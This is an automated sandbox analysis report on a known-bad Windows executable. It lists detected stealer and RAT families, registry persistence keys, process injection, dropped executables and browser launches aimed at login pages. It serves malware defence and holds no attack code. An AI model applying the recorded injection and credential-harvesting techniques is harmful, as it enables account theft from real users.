Analysis Overview
SHA256
2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0
Threat Level: Known bad
The file NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe was found to be: Known bad.
Malicious Activity Summary
Glupteba
Detect Mystic stealer payload
SectopRAT payload
Mystic
Glupteba payload
RedLine payload
SectopRAT
SmokeLoader
RedLine
ZGRat
Detect ZGRat V1
Stops running service(s)
Downloads MZ/PE file
Modifies Windows Firewall
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Adds Run key to start application
Suspicious use of SetThreadContext
AutoIT Executable
Launches sc.exe
Unsigned PE
Program crash
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious behavior: MapViewOfSection
Checks SCSI registry key(s)
Suspicious use of SendNotifyMessage
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-11 10:20
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-11 10:20
Reported
2023-11-11 10:23
Platform
win10v2004-20231023-en
Max time kernel
80s
Max time network
156s
Command Line
Signatures
Detect Mystic stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Mystic
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
ZGRat
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2231940048-779848787-2990559741-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\214C.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Jh0bl33.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F9AD.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FA89.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\214C.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2479.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F9AD.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F9AD.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2140 set thread context of 8632 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 8144 set thread context of 6400 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Jh0bl33.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\F9AD.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\FA89.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,3044931681823620667,12414061407216790580,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,10790248111191077607,10303531561963982845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,10790248111191077607,10303531561963982845,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,701871821419763544,18307310049354167736,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,701871821419763544,18307310049354167736,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,3044931681823620667,12414061407216790580,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1780,1017667590340143429,12848925900103415440,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1780,1017667590340143429,12848925900103415440,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,5721535188051344480,17370459632319772641,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,5721535188051344480,17370459632319772641,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,4219469405257606188,1988454598763064376,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
